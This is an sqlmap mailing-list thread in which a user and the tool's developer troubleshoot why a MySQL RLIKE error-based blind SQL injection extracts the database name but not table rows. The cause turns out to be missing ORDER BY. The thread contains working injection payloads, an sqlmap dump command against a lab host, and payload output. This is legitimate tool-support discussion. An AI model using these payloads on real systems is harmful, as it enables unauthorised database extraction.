BTW I hope this doesn’t come across as it being a problem with sqlmap, I think it is a problem with the local system’s mysql instance, just trying to figure out why an RLIKE injection would allow enumeration of DATABASE() but not from the users table. I figured I would ask this list if anyone else had experienced similar, though.
‘admin’ is the only user in the database, so I know it is the only row that could be returned, but order by presents the same results… mysql> select ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1)); +----------------------------------------------------------------+ | ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1)) | +----------------------------------------------------------------+ | 97 | +----------------------------------------------------------------+ 1 row in set (0.00 sec) mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); Empty set (0.00 sec) Might just need to say it is some quirk on the exploitable system’s MySQL instance… It’s a little bizarre. mysql Ver 14.14 Distrib 5.6.19, for Linux (x86_64) using EditLine wrapper > On Feb 22, 2015, at 7:31 AM, Miroslav Stampar <miroslav.stam...@gmail.com> > wrote: > > Hi again. > > I believe that we have a problem here. I am trying to reproduce your > "problem" and can't do it: > > mysql> select * from users; > +----+--------+----------------------------------+ > | id | name | surname | > +----+--------+----------------------------------+ > | 1 | admin | blissett | > | 2 | fluffy | bunny | > | 3 | wu | ming | > | 4 | NULL | nameisnull | > | 5 | md5 | 098f6bcd4621d373cade4e832627b4f6 | > +----+--------+----------------------------------+ > 5 rows in set (0.00 sec) > mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN > (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); > Empty set (0.00 sec) > mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN > (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); > ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp > mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN > (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 > ELSE 0x28 END)); > ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp > mysql> SELECT `name` from users LIMIT 0,1; > +-------+ > | name | > +-------+ > | admin | > +-------+ > 1 row in set (0.00 sec) > mysql> > > I believe that you have a problem with order of returned results. You can't > expect query results to be returned in deterministic way. That's just how the > DBMS works. > > Also, that's why we use ORDER BY wherever we can, to skip this kind of > problems. If you take a look into -v 3 of your run in sqlmap you'll see that > it uses "ORDER BY", while you don't use in your case: > > [14:30:20] [PAYLOAD] 1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT > IFNULL(CAST(name AS CHAR),0x20) FROM testdb.users ORDER BY id LIMIT > 0,1),6,1))>2) THEN 1 ELSE 0 x28 END)) > > Kind regards, > Miroslav Stampar > > On Sun, Feb 22, 2015 at 2:16 PM, Miroslav Stampar <miroslav.stam...@gmail.com > <mailto:miroslav.stam...@gmail.com>> wrote: > "I only bring it up because sql map has no problem grabbing the database with > rlike but can't enumerate the values from the user table" > > $ python sqlmap.py -u "http://192.168.223.129/sqlmap/mysql/get_int.php?id=1 > <http://192.168.223.129/sqlmap/mysql/get_int.php?id=1>" --batch > --test-filter="RLIKE" --dump -D testdb -T users > > ... > > sqlmap identified the following injection points with a total of 0 HTTP(s) > reque > sts: > --- > Parameter: id (GET) > Type: boolean-based blind > Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP > BY > clause > Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28 END)) > --- > ... > > [14:14:52] [INFO] postprocessing table dump > Database: testdb > Table: users > [5 entries] > +----+--------+-----------------------------------------+ > | id | name | surname | > +----+--------+-----------------------------------------+ > | 1 | luther | blissett | > | 2 | fluffy | bunny | > | 3 | wu | ming | > | 4 | NULL | nameisnull | > | 5 | md5 | 098f6bcd4621d373cade4e832627b4f6 (test) | > +----+--------+-----------------------------------------+ > > On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bperry.volat...@gmail.com > <mailto:bperry.volat...@gmail.com>> wrote: > Right, in the sql statement where I select 'a', the ord of this is not > greater than 112, and it fails as expected with parens not balanced. > > The query below this that selects the first name from users should be > functionally equivalent to select 'a' as mid is used to select the first > character of the first username which is 'admin' as shown, but this statement > does not fail as expected. > > I am at a loss as to why the latter does not fail when the inner select is > functionally equivalent to select 'a', and the former fails as expected. > > I only bring it up because sql map has no problem grabbing the database with > rlike but can't enumerate the values from the user table, and I logged into > the server as root to try to figure out what the issue might be and this > seems to be the root cause. > > Sent from a phone > > On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <miroslav.stam...@gmail.com > <mailto:miroslav.stam...@gmail.com>> wrote: > >> Hi. >> >> Maybe I've mistaken, but you are looking this RLIKE wrong. Its function here >> (in your case) is to PROVOKE errors on False, and that's exactly what's >> going on here. >> >> In case of True, RLIKE is called with perfectly valid 0x7474747474, while in >> case of False its called with errorneous regexp 0x28 ('parentheses not >> balanced'). >> >> Bye >> >> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bperry.volat...@gmail.com >> <mailto:bperry.volat...@gmail.com>> wrote: >> Have an injection that I can use RLIKE to induce a 500 error, but it only >> works in some circumstances. Enumerating the DATABASE() value works, as well >> as the current user, but enumerating values from the database tables fails. >> Even as root on the box, the RLIKE query fails to throw an exception when >> attempting to use RLIKE in some instances. >> >> As you can see in the output below, the user can select the first name value >> from the users table (which is ‘admin’). When using RLIKE to test the first >> character returned with DATABASE() (a ‘p’), you get the parentheses not >> balanced exception as expected. You also get this exception when simply >> selecting ‘a’. >> >> But when you select the first row from the users table and grab the first >> character (an ‘a’), no exception is thrown and an empty result set is >> returned. >> >> Any thoughts? >> >> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN >> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); >> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp >> >> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN >> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END)); >> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp >> >> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN >> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 >> ELSE 0x28 END)); >> Empty set (0.01 sec) >> >> mysql> SELECT `name` from users LIMIT 0,1; >> +-------+ >> | name | >> +-------+ >> | admin | >> +-------+ >> 1 row in set (0.00 sec) >> >> mysql> >> >> ------------------------------------------------------------------------------ >> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server >> from Actuate! Instantly Supercharge Your Business Reports and Dashboards >> with Interactivity, Sharing, Native Excel Exports, App Integration & more >> Get technology previously reserved for billion-dollar corporations, FREE >> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk >> <http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk> >> _______________________________________________ >> sqlmap-users mailing list >> sqlmap-users@lists.sourceforge.net >> <mailto:sqlmap-users@lists.sourceforge.net> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> <https://lists.sourceforge.net/lists/listinfo/sqlmap-users> >> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm <http://about.me/stamparm> > > > -- > Miroslav Stampar > http://about.me/stamparm <http://about.me/stamparm> > > > -- > Miroslav Stampar > http://about.me/stamparm <http://about.me/stamparm>
signature.asc
Description: Message signed with OpenPGP using GPGMail
------------------------------------------------------------------------------ Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server from Actuate! Instantly Supercharge Your Business Reports and Dashboards with Interactivity, Sharing, Native Excel Exports, App Integration & more Get technology previously reserved for billion-dollar corporations, FREE http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
